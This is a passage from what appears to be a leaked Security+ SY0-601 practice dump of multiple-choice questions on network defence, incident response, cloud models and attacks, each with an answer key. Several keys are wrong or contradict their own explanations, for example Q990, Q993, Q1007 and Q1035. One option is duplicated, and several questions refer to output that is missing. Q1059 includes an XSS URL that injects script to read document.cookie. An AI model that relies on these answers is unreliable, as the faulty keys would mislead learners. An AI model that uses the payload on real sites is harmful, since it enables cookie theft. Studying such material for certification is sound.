individuals from gaining access to secure areas. They work by providing an intermediate space
between two secure doors, where individuals must first be authenticated before being granted
access through the second door. This prevents multiple people from using a single card swipe to
enter a secure area, as only one individual can enter the vestibule at a time and must be
authenticated before proceeding through the second door.
QUESTION 968
Unauthorized devices have been detected on the internal network. The devices' locations were
traced to Ethernet ports located in conference rooms. Which of the following would be the best
technical controls to implement to prevent these devices from accessing the internal network?
A.
B.
C.
D.
NAC
DLP
IDS
MFA
Answer: A
Explanation:
NAC (Network Access Control) would be the best technical control to prevent unauthorized
devices from accessing the internal network. NAC can be used to enforce policies that allow only
authorized devices to connect to the network. It can also ensure that devices meet certain
security requirements, such as the presence of antivirus software, before granting access to the
network.
QUESTION 969
A Chief Information Security Officer (CISO) wants to implement a new solution that can protect
against certain categories of websites whether the employee is in the office or away. Which of the
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
337
following solutions should the CISO implement?
A.
B.
C.
D.
WAF
SWG
VPN
HIDS
Answer: B
Explanation:
SWG (Secure Web Gateway) would be the best solution for protecting against certain categories
of websites, whether the employee is in the office or away. SWGs are designed to monitor and
filter internet traffic to and from user devices, blocking access to known malicious sites or sites
that violate company policies. They provide protection against web-based threats such as
malware, phishing, and other types of attacks.
QUESTION 970
A security analyst is using OSINT to gather information to verify whether company data is
available publicly. Which of the following is the best application for the analyst to use?
A.
B.
C.
D.
theHarvester
Cuckoo
Nmap
Nessus
Answer: A
QUESTION 971
A network engineer receives a call regarding multiple LAN-connected devices that are on the
same switch. The devices have suddenly been experiencing speed and latency issues while
connecting to network resources. The engineer enters the command show mac address-table
and reviews the following output:
Which of the following best describes the attack that is currently in progress?
A.
B.
C.
D.
MAC flooding
Evil twin
ARP poisoning
DHCP spoofing
Answer: A
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
338
QUESTION 972
A security administrator needs to add fault tolerance and load balancing to the connection from
the file server to the backup storage. Which of the following is the best choice to achieve this
objective?
A.
B.
C.
D.
Multipath
RAID
Segmentation
802.11
Answer: A
Explanation:
Multipath is a technique that uses multiple paths between two devices to provide fault tolerance
and load balancing. With Multipath, if one path fails, traffic is automatically rerouted to the
available path, ensuring high availability and data access. It also provides load balancing by
distributing traffic across multiple paths, reducing congestion on individual links and improving
performance.
QUESTION 973
Which of the following incident response phases should the proper collection of the detected IoCs
and establishment of a chain of custody be performed before?
A.
B.
C.
D.
Containment
Identification
Preparation
Recovery
Answer: B
Explanation:
The proper collection of the detected IoCs and establishment of a chain of custody should be
performed before the Containment phase in incident response.
QUESTION 974
Which of the following measures the average time that equipment will operate before it breaks?
A.
B.
C.
D.
SLE
MTBF
RTO
ARO
Answer: B
QUESTION 975
A security administrator examines the ARP table of an access switch and sees the following
output:
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
339
A.
B.
C.
D.
DDoS on Fa0/2 port
MAC flooding on Fa0/2 port
ARP poisoning on Fa0/1 port
DNS poisoning on port Fa0/1
Answer: B
QUESTION 976
Which of the following documents specifies what to do in the event of catastrophic loss of a
physical or virtual system?
A.
B.
C.
D.
Data retention plan
Incident response plan
Disaster recovery plan
Communication plan
Answer: C
Explanation:
A Disaster Recovery Plan is a documented process for responding to disruptive events such as
natural disasters, cyber attacks, or hardware failures. It outlines the steps that need to be taken to
restore critical systems, applications, and data after a catastrophic event occurs.
QUESTION 977
Which of the following rales is responsible for defining the protection type and classification type
for a given set of files?
A.
B.
C.
D.
General counsel
Data owner
Risk manager
Chief Information Officer
Answer: B
QUESTION 978
An employee's company email is configured with conditional access and requires that MFA is
enabled and used. An example of MFA is a phone call and:
A. a push notification
B. a password
C. an SMS message
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
340
D. an authentication application
Answer: D
QUESTION 979
Which of the following is a security implication of newer ICS devices that are becoming more
common in corporations?
A.
B.
C.
D.
Devices with cellular communication capabilities bypass traditional network security controls
Many devices do not support elliptic-curve encryption algorithms due to the overhead they require
These devices often lack privacy controls and do not meet newer compliance regulations
Unauthorized voice and audio recording can cause loss of intellectual property
Answer: A
Explanation:
ICS devices are used to control and automate industrial processes, such as manufacturing,
energy production, and transportation. In recent years, newer ICS devices that are equipped with
cellular communication capabilities have become more common in corporations. While these
devices can provide benefits such as remote monitoring and control, they also pose security
risks.
QUESTION 980
While troubleshooting service disruption on a mission-critical server, a technician discovered the
user account that was configured to run automated processes was disabled because the user s
password failed to meet password complexity requirements. Which of the following would be the
best solution to securely prevent future issues?
A.
B.
C.
D.
Using an administrator account to run the processes and disabling the account when it is not in use
Implementing a shared account the team can use to run automated processes
Configuring a service account to run the processes
Removing the password complexity requirements for the user account
Answer: C
QUESTION 981
A security analyst is assessing a new y developed web application by testing SQL injection,
CSRF, and XML injection. Which of the follow ng frameworks should the analyst consider?
A.
B.
C.
D.
ISO
MITRE ATT&CK
OWASP
NIST
Answer: C
QUESTION 982
A user s laptop constantly disconnects from the Wi-Fi network. Once the laptop reconnects, the
user can reach the internet but cannot access shared folders or other network resources. Which
of the following types of attacks is the user most likely experiencing?
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
341
A.
B.
C.
D.
Bluejacking
Jamming
Rogue access point
Evil twin
Answer: C
QUESTION 983
Which of the following procedures would be performed after the root cause of a security incident
has been identified to help avoid future incidents from occurring?
A.
B.
C.
D.
Walk-throughs
Lessons learned
Attack framework alignment
Containment
Answer: B
QUESTION 984
A security administrator is integrating several segments onto a single network. One of the
segments, which includes legacy devices, presents a significant amount of risk to the network.
Which of the following would allow users to access to the legacy devices without compromising
the security of the entire network?
A.
B.
C.
D.
E.
NIDS
MAC filtering
Jump server
IPSec
NAT gateway
Answer: C
QUESTION 985
Which of the following would a security analyst use to determine if other companies in the same
sector have seen similar malicious activity against their systems?
A.
B.
C.
D.
Vulnerability scanner
Open-source intelligence
Packet capture
Threat feeds
Answer: D
QUESTION 986
Which of the following types of disaster recovery plan exercises requires the least interruption to
IT operations?
A. Parallel
B. Full-scale
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
342
C. Tabletop
D. Simulation
Answer: C
QUESTION 987
Which of the follow ng disaster recovery sites is the most cost effective to operate?
A.
B.
C.
D.
Warm site
Cold site
Hot site
Hybrid site
Answer: B
QUESTION 988
A security operations center wants to implement a solution that can execute files to test for
malicious activity. The solution should provide a report of the files' activity against known threats.
Which of the following should the security operations center implement?
A.
B.
C.
D.
the Harvester
Nessus
Cuckoo
Sn1per
Answer: C
QUESTION 989
A security administrator would like to ensure all cloud servers will have software preinstalled for
facilitating vulnerability scanning and continuous monitoring. Which of the following concepts
should the administrator utilize?
A.
B.
C.
D.
Provisioning
Staging
Staging
Quality assurance
Answer: A
QUESTION 990
A network architect wants a server to have the ability to retain network availability even if one of
the network switches it is connected to goes down. Which of the following should the architect
implement on the server to achieve this goal?
A.
B.
C.
D.
RAID
UPS
NIC teaming
Load balancing
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
343
Answer: D
QUESTION 991
A security administrator installed a new web server. The administrator did this to increase the
capacity for an application due to resource exhaustion on another server. Which of the following
algorithms should the administrator use to split the number of the connections on each server in
half?
A.
B.
C.
D.
Weighted response
Round-robin
Least connection
Weighted least connection
Answer: B
QUESTION 992
Security analysts have noticed the network becomes flooded with malicious packets at specific
times of the day. Which of the following should the analysts use to investigate this issue?
A.
B.
C.
D.
Web metadata
Bandwidth monitors
System files
Correlation dashboards
Answer: D
QUESTION 993
A security administrator performs weekly vulnerability scans on all cloud assets and provides a
detailed report. Which of the following describes the administrator's activities?
A.
B.
C.
D.
Continuous deployment
Continuous integration
Data owners
Data processor
Answer: D
QUESTION 994
An attacker is targeting a company. The attacker notices that the company's employees
frequently access a particular website. The attacker decides to infect the website with malware
and hopes the employees' devices will also become infected. Which of the following techniques is
the attacker using?
A.
B.
C.
D.
Watering-hole attack
Pretexting
Typosquatting
Impersonation
Answer: A
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
344
QUESTION 995
A digital forensics team at a large company is investigat ng a case in which malicious code was
down oaded over an HTTPS connection and was running in memory, but was never committed to
disk. Which of the following techniques should the team use to obtain a sample of the malware
binary?
A.
B.
C.
D.
pcap reassembly
SSD snapshot
Image volatile memory
Extract from checksums
Answer: C
QUESTION 996
A website visitor is required to provide properly formatted information in a specific field on a
website form. Which of the following security measures is most likely used for this mandate?
A.
B.
C.
D.
Input validation
Code signing
SQL injection
Form submission
Answer: A
Explanation:
Input validation is a security measure used to ensure that data entered into a form or application
meets specific requirements and is in the correct format. In this scenario, the website requires the
visitor to provide properly formatted information in a specific field on a website form.
Implementing input validation will check the data entered by the user against predefined criteria to
make sure it meets the required format. If the data does not match the expected format, the form
will likely display an error message and prompt the user to correct their input before submission.
This helps prevent certain types of attacks, such as code injection or data manipulation, by
ensuring that only valid and properly formatted data is accepted by the application or website.
QUESTION 997
A technician is setting up a new firewall on a network segment to allow web traffic to the internet
while hardening the network. After the firewall is configured, users receive errors stating the
website could not be located. Which of the following would best correct the issue?
A.
B.
C.
D.
Setting an explicit deny to all traffic using port 80 instead of 443
Moving the implicit deny from the bottom of the rule set to the top
Configuring the first line in the rule set to allow all traffic
Ensuring that port 53 has been explicitly allowed in the rule set
Answer: D
QUESTION 998
A systems administrator works for a local hospital and needs to ensure patient data is protected
and secure. Which of the following data classifications should be used to secure patient data?
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
345
A.
B.
C.
D.
Private
Critical
Sensitive
Public
Answer: C
QUESTION 999
A small business uses kiosks on the sales floor to display product information for customers. A
security team discovers the kiosks use end-of-life operating systems. Which of the following is the
security team most likely to document as a security implication of the current architecture?
A.
B.
C.
D.
Patch availability
Product software compatibility
Ease of recovery
Cost of replacement
Answer: A
QUESTION 1000
During a security incident, the security operations team identified sustained network traffic from a
malicious IP address: 10.1.4.9. A security analyst is creating an inbound firewall rule to block the
IP address from accessing the organization's network. Which of the following fulfills this request?
A.
B.
C.
D.
access-list inbound deny ip source 0.0.0.0/0 destination 10.1.4.9/32
access-list inbound deny ip source 10.1.4.9/32 destination 0.0.0.0/0
access-list inbound permit ip source 10.1.4.9/32 destination 0.0.0.0/0
access-list inbound permit ip source 0.0.0.0/0 destination 10.1.4.9/32
Answer: B
QUESTION 1001
Which of the following is the phase in the incident response process when a security analyst
reviews roles and responsibilities?
A.
B.
C.
D.
Preparation
Recovery
Lessons learned
Analysis
Answer: A
QUESTION 1002
An administrator is reviewing a single server's security logs and discovers the following:
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
346
Which of the following best describes the action captured in this log file?
A.
B.
C.
D.
Brute-force attack
Privilege escalation
Failed password audit
Forgotten password by the user
Answer: A
QUESTION 1003
Which of the following can be used to identify potential attacker activities without affecting
production servers?
A.
B.
C.
D.
Honeypot
Video surveillance
Zero trust
Geofencing
Answer: A
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
347
QUESTION 1004
A company wants the ability to restrict web access and monitor the websites that employees visit.
Which of the following would best meet these requirements?
A.
B.
C.
D.
Internet proxy
VPN
WAF
Firewall
Answer: A
QUESTION 1005
A security analyst notices an unusual amount of traffic hitting the edge of the network. Upon
examining the logs, the analyst identifies a source IP address and blocks that address from
communicating with the network. Even though the analyst is blocking this address, the attack is
still ongoing and coming from a large number of different source IP addresses. Which of the
following describes this type of attack?
A.
B.
C.
D.
DDoS
Privilege escalation
DNS poisoning
Buffer overflow
Answer: A
QUESTION 1006
A company needs to centralize its logs to create a baseline and have visibility on its security
events. Which of the following technologies will accomplish this objective?
A.
B.
C.
D.
Security information and event management
A web application firewall
A vulnerability scanner
A next-generation firewall
Answer: A
QUESTION 1007
Two organizations are discussing a possible merger. Both organizations' Chief Financial Officers
would like to safely share payroll data with each other to determine if the pay scales for different
roles are similar at both organizations. Which of the following techniques would be best to protect
employee data while allowing the companies to successfully share this information?
A.
B.
C.
D.
Pseudo-anonymization
Tokenization
Data masking
Encryption
Answer: C
Explanation:
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
348
Tokenization: Tokenization involves replacing sensitive data, such as employee payroll data, with
unique tokens that have no meaningful correlation to the original data. The tokens can be used
for analysis, comparisons, or other operations without exposing the actual payroll data. This
technique ensures the privacy and confidentiality of the employee information while allowing the
organizations to perform their analysis.
QUESTION 1008
A large retail store's network was breached recently, and this news was made public. The store
did not lose any intellectual property, and no customer information was stolen. Although no fines
were incurred as a result, the store lost revenue after the breach. Which of the following is the
most likely reason for this issue?
A.
B.
C.
D.
Employee training
Leadership changes
Reputation damage
Identity theft
Answer: C
QUESTION 1009
A government organization is developing an advanced Al defense system. Developers are using
information collected from third-party providers. Analysts are noticing inconsistencies in the
expected progress of the Al learning and attribute the outcome to a recent attack on one of the
suppliers. Which of the following is the most likely reason for the inaccuracy of the system?
A.
B.
C.
D.
Improper algorithms security
Tainted training data
Fileless virus
Cryptomalware
Answer: B
QUESTION 1010
A company's help desk has received calls about the wireless network being down and users
being unable to connect to it. The network administrator says all access points are up and
running. One of the help desk technicians notices the affected users are working in a building
near the parking lot. Which of the following is the most likely reason for the outage?
A.
B.
C.
D.
Someone near the building is jamming the signal.
A user has set up a rogue access point near the building.
Someone set up an evil twin access point in the affected area.
The APs in the affected area have been unplugged from the network.
Answer: A
QUESTION 1011
Which of the following can best protect against an employee inadvertently installing malware on a
company system?
A. Host-based firewall
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
349
B. System isolation
C. Least privilege
D. Application allow list
Answer: C
Explanation:
The principle of least privilege ensures that users are granted only the minimum level of access
necessary to perform their job responsibilities. By implementing least privilege, employees have
restricted access rights and permissions, limiting their ability to install or execute unauthorized
software, including malware.
QUESTION 1012
An information security officer at a credit card transaction company is conducting a frameworkmapping exercise with the internal controls. The company recently established a new office in
Europe. To which of the following frameworks should the security officer map the existing
controls? (Choose two.)
A.
B.
C.
D.
E.
F.
ISO
PCIDSS
SOC
GDPR
CSA
NIST
Answer: BD
QUESTION 1013
A customer called a company's security team to report that all invoices the customer has received
over the last five days from the company appear to have fraudulent banking details. An
investigation into the matter reveals the following:
- The manager of the accounts payable department is using the same password across multiple
external websites and the corporate account.
- One of the websites the manager used recently experienced a data breach.
- The manager's corporate email account was successfully accessed in the last five days by an IP
address located in a foreign country.
Which of the following attacks has most likely been used to compromise the manager's corporate
account?
A.
B.
C.
D.
E.
Remote access Trojan
Brute-force
Dictionary
Credential stuffing
Password spraying
Answer: D
QUESTION 1014
An organization's corporate offices were destroyed due to a natural disaster, so the organization
is now setting up offices in a temporary work space. Which of the following will the organization
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
350
most likely consult?
A.
B.
C.
D.
The business continuity plan
The risk management plan
The communication plan
The incident response plan
Answer: A
QUESTION 1015
Security analysts notice a server login from a user who has been on vacation for two weeks. The
analysts confirm that the user did not log in to the system while on vacation. After reviewing
packet capture logs, the analysts notice the following:
Which of the following occurred?
A.
B.
C.
D.
A buffer overflow was exploited to gain unauthorized access.
The user's account was compromised, and an attacker changed the login credentials.
An attacker used a pass-the-hash attack to gain access.
An insider threat with username smithJA logged in to the account.
Answer: C
QUESTION 1016
A security analyst is taking part in an evaluation process that analyzes and categorizes threat
actors of real-world events in order to improve the incident response team's process. Which of
the following is the analyst most likely participating in?
A.
B.
C.
D.
E.
MITRE ATT&CK
Walk-through
Red team
Purple team
TAXII
Answer: A
QUESTION 1017
A network manager wants to protect the company's VPN by multifactor authentication that uses:
- Something you know
- Something you have
- Somewhere you are
Which of the following would accomplish the manager's goal?
A. Domain name. PKI, GeoIP lookup
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
351
B. VPN IP address, company ID. partner site
C. Password, authentication token, thumbprint
D. Company URL, TLS certificate, home address
Answer: C
QUESTION 1018
Which of the following terms should be included in a contract to help a company monitor the
ongoing security maturity of a new vendor?
A.
B.
C.
D.
A right-to-audit clause allowing for annual security audits
Requirements for event logs to be kept for a minimum of 30 days
Integration of threat intelligence in the company's AV
A data-breach clause requiring disclosure of significant data loss
Answer: A
QUESTION 1019
Which of the following cloud models provides clients with servers, storage, and networks but
nothing else?
A.
B.
C.
D.
SaaS
PaaS
IaaS
DaaS
Answer: C
QUESTION 1020
A marketing coordinator is trying to access a social media application on a company laptop but is
getting blocked. The coordinator opens a help desk ticket to report the issue. Which of the
following documents should a security analyst review to determine whether accessing social
media applications on a company device is permitted?
A.
B.
C.
D.
Incident response policy
Business continuity policy
Change management policy
Acceptable use policy
Answer: D
QUESTION 1021
Law enforcement officials sent a company a notification that states electronically stored
information and paper documents cannot be destroyed. Which of the following explains this
process?
A. Data breach notification
B. Accountability
C. Legal hold
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
352
D. Chain of custody
Answer: C
QUESTION 1022
A company wants to deploy decoy systems alongside production systems in order to entice threat
actors and to learn more about attackers. Which of the following best describes these systems?
A.
B.
C.
D.
DNS sinkholes
Honeypots
Virtual machines
Neural networks
Answer: B
QUESTION 1023
A company's help desk received several AV alerts indicating Mimikatz attempted to run on the
remote systems. Several users also reported that the new company flash drives they picked up in
the break room only have 512KB of storage. Which of the following is most likely the cause?
A. The GPO prevents the use of flash drives, which triggers a false positive AV indication and
restricts the drives to only 512KB of storage.
B. The new flash drives need a driver that is being blocked by the AV software because the flash
drives are not on the application's allow list, temporarily restricting the drives to 512KB of storage.
C. The new flash drives are incorrectly partitioned, and the systems are automatically trying to use
an unapproved application to repartition the drives.
D. The GPO blocking the flash drives is being bypassed by a malicious flash drive that is attempting
to harvest plaintext credentials from memory.
Answer: D
QUESTION 1024
A company has installed badge readers for building access but is finding unauthorized individuals
roaming the hallways. Which of the following is the most likely cause?
A.
B.
C.
D.
Shoulder surfing
Phishing
Tailgating
Identity fraud
Answer: C
QUESTION 1025
An organization routes all of its traffic through a VPN. Most users are remote and connect into a
corporate data center that houses confidential information. There is a firewall at the internet
border, followed by a DLP appliance, the VPN server, and the data center itself. Which of the
following is the weakest design element?
A. The DLP appliance should be integrated into a NGFW.
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
353
B. Split-tunnel connections can negatively impact the DLP appliance's performance.
C. Encrypted VPN traffic will not be inspected when entering or leaving the network.
D. Adding two hops in the VPN tunnel may slow down remote connections.
Answer: C
QUESTION 1026
Which of the following is the best method for ensuring non-repudiation?
A.
B.
C.
D.
SSO
Digital certificate
Token
SSH key
Answer: B
QUESTION 1027
Which of the following methods is the most effective for reducing vulnerabilities?
A.
B.
C.
D.
Joining an information-sharing organization
Using a scan-patch-scan process
Implementing a bug bounty program
Patching low-scoring vulnerabilities first
Answer: B
QUESTION 1028
An organization is struggling with scaling issues on its VPN concentrator and internet circuit due
to remote work. The organization is looking for a software solution that will allow it to reduce
traffic on the VPN and internet circuit, while still providing encrypted tunnel access to the data
center and monitoring of remote employee internet traffic. Which of the following will help achieve
these objectives?
A.
B.
C.
D.
Deploying a SASE solution to remote employees
Building a load-balanced VPN solution with redundant internet
Purchasing a low-cost SD-WAN solution for VPN traffic
Using a cloud provider to create additional VPN concentrators
Answer: A
QUESTION 1029
Which of the following is the best reason to complete an audit in a banking environment?
A.
B.
C.
D.
Regulatory requirement
Organizational change
Self-assessment requirement
Service-level requirement
Answer: A
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
354
QUESTION 1030
After a recent ransomware attack on a company's system, an administrator reviewed the log files.
Which of the following control types did the administrator use?
A.
B.
C.
D.
Compensating
Detective
Preventive
Corrective
Answer: B
QUESTION 1031
A technician needs to apply a high-priority patch to a production system. Which of the following
steps should be taken first?
A.
B.
C.
D.
Air gap the system.
Move the system to a different network segment.
Create a change control request.
Apply the patch to the system.
Answer: C
QUESTION 1032
A security analyst reports a company policy violation in a case in which a large amount of
sensitive data is being downloaded after hours from various mobile devices to an external site.
Upon further investigation, the analyst notices that successful login attempts are being conducted
with impossible travel times during the same time periods when the unauthorized downloads are
occurring. The analyst also discovers a couple of WAPs are using the same SSID, but they have
non-standard DHCP configurations and an overlapping channel. Which of the following attacks is
being conducted?
A.
B.
C.
D.
E.
Evil twin
Jamming
DNS poisoning
Bluesnarfing
DDoS
Answer: A
QUESTION 1033
Several users have opened tickets with the help desk. The help desk has reassigned the tickets
to a security analyst for further review. The security analyst reviews the following metrics:
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
355
Which of the following is most likely the result of the security analyst's review?
A.
B.
C.
D.
The ISP is dropping outbound connections.
The user of the Sales-PC fell for a phishing attack
Corporate PCs have been turned into a botnet.
An on-path attack is taking place between PCs and the router.
Answer: C
QUESTION 1034
An engineer needs to deploy a security measure to identify and prevent data tampering within the
enterprise. Which of the following will accomplish this goal?
A.
B.
C.
D.
Antivirus
IPS
FTP
FIM
Answer: D
QUESTION 1035
Which of the following mitigation techniques places devices in physically or logically separated
networks and leverages policies to limit the types of communications that are allowed?
A.
B.
C.
D.
Host-based firewalls
Access control list
Port security
Least privilege
Answer: A
QUESTION 1036
All security analysts' workstations at a company have network access to a critical server VLAN.
The information security manager wants to further enhance the controls by requiring that all
access to the secure VLAN be authorized only from a given single location. Which of the following
will the information security manager most likely implement?
A. A forward proxy server
B. A jump server
C. A reverse proxy server
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
356
D. A stateful firewall server
Answer: B
QUESTION 1037
Which of the following best describes why a company would erase a newly purchased device and
install its own image with an operating system and applications?
A.
B.
C.
D.
Installing a new operating system thoroughly tests the equipment
Removing unneeded applications reduces the system's attack surface
Reimaging a system creates an updated baseline of the computer image
Wiping the device allows the company to evaluate its performance
Answer: B
QUESTION 1038
A backdoor was detected on the containerized application environment. The investigation
detected that a zero-day vulnerability was introduced when the latest container image version
was downloaded from a public registry. Which of the following is the best solution to prevent this
type of incident from occurring again?
A. Enforce the use of a controlled trusted source of container images.
B. Deploy an IPS solution capable of detecting signatures of attacks targeting containers.
C. Define a vulnerability scan to assess container images before being introduced on the
environment.
D. Create a dedicated VPC for the containerized environment.
Answer: A
QUESTION 1039
An external forensics investigator has been hired to investigate a data breach at a large
enterprise with numerous assets. It is known that the breach started in the perimeter network and
moved to the sensitive information, generating multiple logs as the attacker traversed through the
network. Which of the following will best assist with this investigation?
A.
B.
C.
D.
Perform a vulnerability scan to identify the weak spots.
Use a packet analyzer to investigate the NetFlow traffic.
Check the SIEM to review the correlated logs.
Require access to the routers to view current sessions.
Answer: C
QUESTION 1040
A Chief Information Security Officer (CISO) needs to create a policy set that meets international
standards for data privacy and sharing. Which of the following should the CISO read and
understand before writing the policies?
A. PCI DSS
B. GDPR
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
357
C. NIST
D. ISO 31000
Answer: B
QUESTION 1041
During an internal penetration test, a security analyst identified a network device that had
accepted cleartext authentication and was configured with a default credential. Which of the
following recommendations should the security analyst make to secure this device?
A.
B.
C.
D.
Configure SNMPv1.
Configure SNMPv2c.
Configure SNMPv3.
Configure the default community string.
Answer: C
QUESTION 1042
Developers are writing code and merging it into shared repositories several times a day, where it
is tested automatically. Which of the following concepts does this best represent?
A.
B.
C.
D.
Functional testing
Stored procedures
Elasticity
Continuous integration
Answer: D
QUESTION 1043
A large financial services firm recently released information regarding a security breach within its
corporate network that began several years before. During the time frame in which the breach
occurred, indicators show an attacker gained administrative access to the network through a file
downloaded from a social media site and subsequently installed it without the user's knowledge.
Since the compromise, the attacker was able to take command and control of the computer
systems anonymously while obtaining sensitive corporate and personal employee information.
Which of the following methods did the attacker most likely use to gain access?
A.
B.
C.
D.
A bot
A fileless virus
A logic bomb
A RAT
Answer: D
QUESTION 1044
Recent changes to a company's BYOD policy require all personal mobile devices to use a twofactor authentication method that is not something you know or have. Which of the following will
meet this requirement?
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
358
A.
B.
C.
D.
Facial recognition
Six-digit PIN
PKI certificate
Smart card
Answer: A
QUESTION 1045
A critical file server is being upgraded, and the systems administrator must determine which RAID
level the new server will need to achieve parity and handle two simultaneous disk failures. Which
of the following RAID levels meets this requirement?
A.
B.
C.
D.
RAID 0+1
RAID 2
RAID 5
RAID 6
Answer: D
QUESTION 1046
A company must ensure sensitive data at rest is rendered unreadable. Which of the following will
the company most likely use?
A.
B.
C.
D.
Hashing
Tokenization
Encryption
Segmentation
Answer: C
QUESTION 1047
A security assessment found that several embedded systems are running unsecure protocols.
These systems were purchased two years ago, and the company that developed them is no
longer in business. Which of the following constraints best describes the reason the findings
cannot be remediated?
A.
B.
C.
D.
Inability to authenticate
Implied trust
Lack of computing power
Unavailable patch
Answer: D
QUESTION 1048
A security engineer is concerned about using an agent on devices that relies completely on
defined known-bad signatures. The security engineer wants to implement a tool with multiple
components including the ability to track, analyze, and monitor devices without reliance on
definitions alone. Which of the following solutions best fits this use case?
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
359
A.
B.
C.
D.
EDR
DLP
NGFW
HIPS
Answer: A
QUESTION 1049
A user's login credentials were recently compromised. During the investigation, the security
analyst determined the user input credentials into a pop-up window when prompted to confirm the
username and password. However, the trusted website does not use a pop-up for entering user
credentials. Which of the following attacks occurred?
A.
B.
C.
D.
Cross-site scripting
SQL injection
DNS poisoning
Certificate forgery
Answer: A
QUESTION 1050
To reduce costs and overhead, an organization wants to move from an on-premises email
solution to a cloud-based email solution. At this time, no other services will be moving. Which of
the following cloud models would best meet the needs of the organization?
A.
B.
C.
D.
MaaS
IaaS
SaaS
PaaS
Answer: C
QUESTION 1051
A software development manager wants to ensure the authenticity of the code created by the
company. Which of the following options is the most appropriate?
A.
B.
C.
D.
Testing input validation on the user input fields
Performing code signing on company-developed software
Performing static code analysis on the software
Ensuring secure cookies are used
Answer: B
QUESTION 1052
An organization is having difficulty correlating events from its individual AV, EDR, DLP, SWG,
WAF, MDM, HIPS, and CASB systems. Which of the following is the best way to improve the
situation?
A. Remove expensive systems that generate few alerts.
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
360
B. Modify the systems to alert only on critical issues.
C. Utilize a SIEM to centralize logs and dashboards.
D. Implement a new syslog/NetFlow appliance.
Answer: C
QUESTION 1053
A company's end users are reporting that they are unable to reach external websites. After
reviewing the performance data for the DNS severs, the analyst discovers that the CPU, disk, and
memory usage are minimal, but the network interface is flooded with inbound traffic. Network logs
show only a small number of DNS queries sent to this server. Which of the following best
describes what the security analyst is seeing?
A.
B.
C.
D.
Concurrent session usage
Secure DNS cryptographic downgrade
On-path resource consumption
Reflected denial of service
Answer: D
QUESTION 1054
An audit identified PII being utilized in the development environment of a critical application. The
Chief Privacy Officer (CPO) is adamant that this data must be removed; however, the developers
are concerned that without real data they cannot perform functionality tests and search for
specific data. Which of the following should a security professional implement to best satisfy both
the CPO's and the development team's requirements?
A.
B.
C.
D.
Data purge
Data encryption
Data masking
Data tokenization
Answer: C
QUESTION 1055
A security analyst is investigating a malware incident at a company. The malware is accessing a
command-and-control website at www.comptia.com. All outbound Internet traffic is logged to a
syslog server and stored in /logfiles/messages. Which of the following commands would be best
for the analyst to use on the syslog server to search for recent traffic to the command-and-control
website?
A.
B.
C.
D.
head -500 www.comptia.com | grep /logfiles/messages
cat /logfiles/messages | tail -500 www.comptia.com
tail -500 /logfiles/messages | grep www.comptia.com
grep -500 /logfiles/messages | cat www.comptia.com
Answer: C
QUESTION 1056
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
361
A systems administrator set up an automated process that checks for vulnerabilities across the
entire environment every morning. Which of the following activities is the systems administrator
conducting?
A.
B.
C.
D.
Scanning
Alerting
Reporting
Archiving
Answer: A
QUESTION 1057
An engineer is setting up a VDI environment for a factory location, and the business wants to
deploy a low-cost solution to enable users on the shop floor to log in to the VDI environment
directly. Which of the following should the engineer select to meet these requirements?
A.
B.
C.
D.
Laptops
Containers
Thin clients
Workstations
Answer: C
QUESTION 1058
A systems administrator receives the following alert from a file integrity monitoring tool:
The hash of the cmd.exe file has changed.
The systems administrator checks the OS logs and notices that no patches were applied in the
last two months. Which of the following most likely occurred?
A.
B.
C.
D.
The end user changed the file permissions.
A cryptographic collision was detected.
A snapshot of the file system was taken.
A rootkit was deployed.
Answer: D
QUESTION 1059
A security analyst was asked to evaluate a potential attack that occurred on a publicly accessible
section of the company's website. The malicious actor posted an entry in an attempt to trick users
into clicking the following:
https://www.comptia.com/contactus/%3Fname%3D%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E
Which of the following was most likely observed?
A. DLL injection
B. Session replay
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
362
C. SQLi
D. XSS
Answer: D
QUESTION 1060
A company's Chief Information Security Officer (CISO) recently warned the security manager that
the company's Chief Executive Officer (CEO) is planning to publish a controversial opinion article
in a national newspaper, which may result in new cyberattacks. Which of the following would be
best for the security manager to use in a threat model?
A.
B.
C.
D.
Hacktivists
White-hat hackers
Script kiddies
Insider threats
Answer: A
QUESTION 1061
Which of the following provides a catalog of security and privacy controls related to the United
States federal information systems?
A.
B.
C.
D.
GDPR
PCI DSS
ISO 27000
NIST 800-53
Answer: D
QUESTION 1062
